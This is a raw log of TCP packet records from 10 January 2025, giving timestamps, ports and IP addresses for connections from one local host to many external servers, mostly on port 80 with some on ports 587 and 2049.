Jan 10, 2025 16:01:38.787286997 CET	80	49742	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:39.146307945 CET	49742	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:39.155579090 CET	49744	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:39.160623074 CET	80	49744	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:39.160706043 CET	49744	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:39.160856009 CET	49744	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:39.160895109 CET	49744	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:39.165854931 CET	80	49744	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:39.165893078 CET	80	49744	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:40.831937075 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:40.832247019 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:40.837163925 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:42.537142992 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:42.538218975 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:42.543083906 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:42.724380970 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:42.725089073 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:42.730249882 CET	587	49738	51.195.88.199	192.168.2.4
Jan 10, 2025 16:01:42.731901884 CET	49738	587	192.168.2.4	51.195.88.199
Jan 10, 2025 16:01:43.146332026 CET	49744	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:43.245357990 CET	49750	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:43.250621080 CET	80	49750	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:43.250873089 CET	49750	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:43.251297951 CET	49750	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:43.251297951 CET	49750	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:43.256195068 CET	80	49750	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:43.256227970 CET	80	49750	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:46.995870113 CET	80	49740	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:46.996036053 CET	49740	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:46.996088028 CET	49740	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:47.000868082 CET	80	49740	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:47.146570921 CET	49750	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:47.232168913 CET	49751	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:47.237135887 CET	80	49751	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:47.237597942 CET	49751	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:47.237782955 CET	49751	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:47.237835884 CET	49751	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:47.242571115 CET	80	49751	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:47.242598057 CET	80	49751	82.112.184.197	192.168.2.4
Jan 10, 2025 16:01:51.148056030 CET	49751	80	192.168.2.4	82.112.184.197
Jan 10, 2025 16:01:51.249413967 CET	49752	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:01:51.254467010 CET	80	49752	47.129.31.212	192.168.2.4
Jan 10, 2025 16:01:51.254543066 CET	49752	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:01:51.254723072 CET	49752	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:01:51.254740000 CET	49752	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:01:51.259567976 CET	80	49752	47.129.31.212	192.168.2.4
Jan 10, 2025 16:01:51.259586096 CET	80	49752	47.129.31.212	192.168.2.4
Jan 10, 2025 16:01:51.261090040 CET	2049	49732	212.162.149.53	192.168.2.4
Jan 10, 2025 16:01:51.261179924 CET	49732	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:51.307805061 CET	49732	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:52.641207933 CET	80	49752	47.129.31.212	192.168.2.4
Jan 10, 2025 16:01:52.641330957 CET	80	49752	47.129.31.212	192.168.2.4
Jan 10, 2025 16:01:52.641407967 CET	49752	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:01:52.641541958 CET	49752	80	192.168.2.4	47.129.31.212
Jan 10, 2025 16:01:52.647077084 CET	80	49752	47.129.31.212	192.168.2.4
Jan 10, 2025 16:01:52.910389900 CET	49753	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:01:52.915328979 CET	80	49753	13.251.16.150	192.168.2.4
Jan 10, 2025 16:01:52.915452957 CET	49753	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:01:52.915965080 CET	49753	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:01:52.916004896 CET	49753	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:01:52.920758963 CET	80	49753	13.251.16.150	192.168.2.4
Jan 10, 2025 16:01:52.920798063 CET	80	49753	13.251.16.150	192.168.2.4
Jan 10, 2025 16:01:54.319830894 CET	80	49753	13.251.16.150	192.168.2.4
Jan 10, 2025 16:01:54.320036888 CET	80	49753	13.251.16.150	192.168.2.4
Jan 10, 2025 16:01:54.320183992 CET	49753	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:01:54.330239058 CET	49753	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:01:54.336433887 CET	80	49753	13.251.16.150	192.168.2.4
Jan 10, 2025 16:01:54.648370981 CET	49754	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:54.653482914 CET	80	49754	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:54.653582096 CET	49754	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:54.653882027 CET	49754	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:54.653913975 CET	49754	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:54.658720016 CET	80	49754	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:54.658797979 CET	80	49754	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.131344080 CET	49754	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.200716972 CET	49755	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.205585003 CET	80	49755	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.205692053 CET	49755	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.205845118 CET	49755	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.205869913 CET	49755	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.210755110 CET	80	49755	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.210779905 CET	80	49755	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.665226936 CET	80	49755	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.665256977 CET	80	49755	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.665349960 CET	49755	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.665433884 CET	49755	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:01:55.670330048 CET	80	49755	44.221.84.105	192.168.2.4
Jan 10, 2025 16:01:55.856322050 CET	49756	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:55.861187935 CET	80	49756	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:55.862684011 CET	49756	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:55.862947941 CET	49756	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:55.863025904 CET	49756	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:55.867681980 CET	80	49756	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:55.867794037 CET	80	49756	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:56.336920023 CET	49757	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:56.341881037 CET	2049	49757	212.162.149.53	192.168.2.4
Jan 10, 2025 16:01:56.341959953 CET	49757	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:56.342291117 CET	49757	2049	192.168.2.4	212.162.149.53
Jan 10, 2025 16:01:56.347069979 CET	2049	49757	212.162.149.53	192.168.2.4
Jan 10, 2025 16:01:57.236938000 CET	80	49756	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:57.237021923 CET	80	49756	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:57.237123966 CET	49756	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:57.363070965 CET	49756	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:01:57.368031979 CET	80	49756	18.141.10.107	192.168.2.4
Jan 10, 2025 16:01:58.308554888 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:58.308852911 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:58.313659906 CET	80	49737	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:58.313766003 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:58.313883066 CET	49737	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:58.313889027 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:58.314157963 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:58.314256907 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:58.318990946 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:58.319086075 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:58.837039948 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:58.863364935 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:58.869139910 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:58.869221926 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:58.869405031 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:58.875237942 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:58.880687952 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:59.340250969 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:59.340308905 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:59.340383053 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:59.648789883 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:59.648833990 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:59.653707981 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:59.653723001 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:59.789016008 CET	80	49758	72.52.178.23	192.168.2.4
Jan 10, 2025 16:01:59.790235043 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:01:59.795053959 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:59.833812952 CET	49758	80	192.168.2.4	72.52.178.23
Jan 10, 2025 16:01:59.893342018 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:59.893363953 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:01:59.893443108 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:02:00.158168077 CET	49760	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:00.163199902 CET	80	49760	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:00.163294077 CET	49760	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:00.163439035 CET	49760	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:00.163460016 CET	49760	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:00.168275118 CET	80	49760	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:00.168293953 CET	80	49760	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:00.922159910 CET	80	49760	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:00.922249079 CET	80	49760	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:00.922369957 CET	49760	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:00.966521978 CET	49760	80	192.168.2.4	34.246.200.160
Jan 10, 2025 16:02:00.971436024 CET	80	49760	34.246.200.160	192.168.2.4
Jan 10, 2025 16:02:01.443978071 CET	49761	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:01.449110031 CET	80	49761	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:01.449197054 CET	49761	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:01.449368000 CET	49761	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:01.449368000 CET	49761	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:01.454147100 CET	80	49761	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:01.454158068 CET	80	49761	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:01.904397011 CET	80	49761	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:01.904475927 CET	80	49761	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:01.904560089 CET	49761	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:01.904560089 CET	49761	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:01.909395933 CET	80	49761	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:02.246776104 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:02.251909018 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.251975060 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:02.252335072 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:02.252335072 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:02.257261038 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.257409096 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.737973928 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.765418053 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:02.765418053 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:02.770196915 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.770261049 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.890870094 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:02.943206072 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:03.067694902 CET	49764	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:03.072624922 CET	80	49764	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:03.072693110 CET	49764	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:03.072871923 CET	49764	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:03.072891951 CET	49764	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:03.077765942 CET	80	49764	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:03.077781916 CET	80	49764	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:04.496238947 CET	80	49764	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:04.496296883 CET	80	49764	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:04.496370077 CET	49764	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:04.496467113 CET	49764	80	192.168.2.4	13.251.16.150
Jan 10, 2025 16:02:04.501318932 CET	80	49764	13.251.16.150	192.168.2.4
Jan 10, 2025 16:02:04.747162104 CET	49770	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:04.752028942 CET	80	49770	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:04.752130985 CET	49770	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:04.752362013 CET	49770	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:04.752362013 CET	49770	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:04.757188082 CET	80	49770	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:04.757205009 CET	80	49770	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:05.209002972 CET	80	49770	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:05.209036112 CET	80	49770	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:05.209106922 CET	49770	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:05.209316969 CET	49770	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:05.214131117 CET	80	49770	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:05.514152050 CET	49776	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:05.519072056 CET	80	49776	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:05.519150019 CET	49776	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:05.519404888 CET	49776	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:05.519419909 CET	49776	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:05.524197102 CET	80	49776	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:05.524241924 CET	80	49776	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:06.240888119 CET	80	49776	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:06.240907907 CET	80	49776	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:06.240981102 CET	49776	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:06.241080999 CET	49776	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:06.245872021 CET	80	49776	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:06.464024067 CET	49785	80	192.168.2.4	35.164.78.200
Jan 10, 2025 16:02:06.468928099 CET	80	49785	35.164.78.200	192.168.2.4
Jan 10, 2025 16:02:06.469075918 CET	49785	80	192.168.2.4	35.164.78.200
Jan 10, 2025 16:02:06.469227076 CET	49785	80	192.168.2.4	35.164.78.200
Jan 10, 2025 16:02:06.469268084 CET	49785	80	192.168.2.4	35.164.78.200
Jan 10, 2025 16:02:06.473999977 CET	80	49785	35.164.78.200	192.168.2.4
Jan 10, 2025 16:02:06.474047899 CET	80	49785	35.164.78.200	192.168.2.4
Jan 10, 2025 16:02:07.204143047 CET	80	49785	35.164.78.200	192.168.2.4
Jan 10, 2025 16:02:07.204288960 CET	49785	80	192.168.2.4	35.164.78.200
Jan 10, 2025 16:02:07.204298973 CET	80	49785	35.164.78.200	192.168.2.4
Jan 10, 2025 16:02:07.204346895 CET	49785	80	192.168.2.4	35.164.78.200
Jan 10, 2025 16:02:07.209076881 CET	80	49785	35.164.78.200	192.168.2.4
Jan 10, 2025 16:02:07.454900980 CET	49793	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:07.459724903 CET	80	49793	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:07.460231066 CET	49793	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:07.471118927 CET	49793	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:07.471118927 CET	49793	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:07.475945950 CET	80	49793	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:07.475958109 CET	80	49793	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:07.928224087 CET	80	49793	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:07.928270102 CET	80	49793	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:07.928466082 CET	49793	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:07.928466082 CET	49793	80	192.168.2.4	3.94.10.34
Jan 10, 2025 16:02:07.937408924 CET	80	49793	3.94.10.34	192.168.2.4
Jan 10, 2025 16:02:08.119826078 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:08.124648094 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:08.124731064 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:08.124856949 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:08.124880075 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:08.129626989 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:08.129641056 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:08.801150084 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:08.844695091 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:08.844722986 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:08.851190090 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:08.851784945 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:09.056545973 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:09.056781054 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:09.056885958 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:09.056946039 CET	49799	80	192.168.2.4	165.160.15.20
Jan 10, 2025 16:02:09.061592102 CET	80	49799	165.160.15.20	192.168.2.4
Jan 10, 2025 16:02:09.297066927 CET	49805	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:09.302328110 CET	80	49805	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:09.302402020 CET	49805	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:09.302539110 CET	49805	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:09.302563906 CET	49805	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:09.308242083 CET	80	49805	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:09.308257103 CET	80	49805	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:09.893167019 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:02:09.893259048 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:02:09.901690960 CET	49759	80	192.168.2.4	199.59.243.228
Jan 10, 2025 16:02:09.906487942 CET	80	49759	199.59.243.228	192.168.2.4
Jan 10, 2025 16:02:10.025219917 CET	80	49805	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:10.025316000 CET	80	49805	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:10.025378942 CET	49805	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:10.025392056 CET	49805	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:10.030215979 CET	80	49805	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:10.273345947 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.273650885 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.278476000 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.278570890 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.278723001 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.278738976 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.279037952 CET	80	49762	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.279206991 CET	49762	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.283543110 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.283555984 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.761368036 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.789216995 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.789253950 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:10.794094086 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.794111967 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.902580976 CET	80	49813	208.117.43.225	192.168.2.4
Jan 10, 2025 16:02:10.943216085 CET	49813	80	192.168.2.4	208.117.43.225
Jan 10, 2025 16:02:11.084980011 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:11.091445923 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:11.091526031 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:11.091665983 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:11.091694117 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:11.098365068 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:11.098400116 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:12.544719934 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:12.544734001 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:12.544749022 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:12.544821024 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:12.544867992 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:12.544976950 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:12.545037985 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:12.545064926 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:12.545125008 CET	49820	80	192.168.2.4	18.246.231.120
Jan 10, 2025 16:02:12.554089069 CET	80	49820	18.246.231.120	192.168.2.4
Jan 10, 2025 16:02:13.012756109 CET	49828	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:13.017769098 CET	80	49828	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:13.017838955 CET	49828	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:13.017987013 CET	49828	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:13.018007994 CET	49828	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:13.022798061 CET	80	49828	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:13.022809029 CET	80	49828	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:13.733278036 CET	80	49828	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:13.733298063 CET	80	49828	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:13.733355999 CET	49828	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:13.737377882 CET	49828	80	192.168.2.4	54.244.188.177
Jan 10, 2025 16:02:13.742218971 CET	80	49828	54.244.188.177	192.168.2.4
Jan 10, 2025 16:02:14.169049978 CET	49835	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:14.173892975 CET	80	49835	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:14.174034119 CET	49835	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:14.174266100 CET	49835	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:14.174266100 CET	49835	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:14.179189920 CET	80	49835	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:14.179224968 CET	80	49835	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:15.544652939 CET	80	49835	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:15.544768095 CET	80	49835	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:15.544857979 CET	49835	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:15.544939041 CET	49835	80	192.168.2.4	18.141.10.107
Jan 10, 2025 16:02:15.549748898 CET	80	49835	18.141.10.107	192.168.2.4
Jan 10, 2025 16:02:15.735801935 CET	49845	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:15.741730928 CET	80	49845	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:15.741822958 CET	49845	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:15.745142937 CET	49845	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:15.745143890 CET	49845	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:15.751529932 CET	80	49845	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:15.751563072 CET	80	49845	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:16.225922108 CET	80	49845	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:16.226063013 CET	80	49845	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:16.226090908 CET	49845	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:16.226128101 CET	49845	80	192.168.2.4	34.227.7.138
Jan 10, 2025 16:02:16.231013060 CET	80	49845	34.227.7.138	192.168.2.4
Jan 10, 2025 16:02:16.456629992 CET	49851	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:16.461500883 CET	80	49851	44.221.84.105	192.168.2.4
Jan 10, 2025 16:02:16.461581945 CET	49851	80	192.168.2.4	44.221.84.105
Jan 10, 2025 16:02:16.461719036 CET	49851	80	192.168.2.4	44.221.84.105
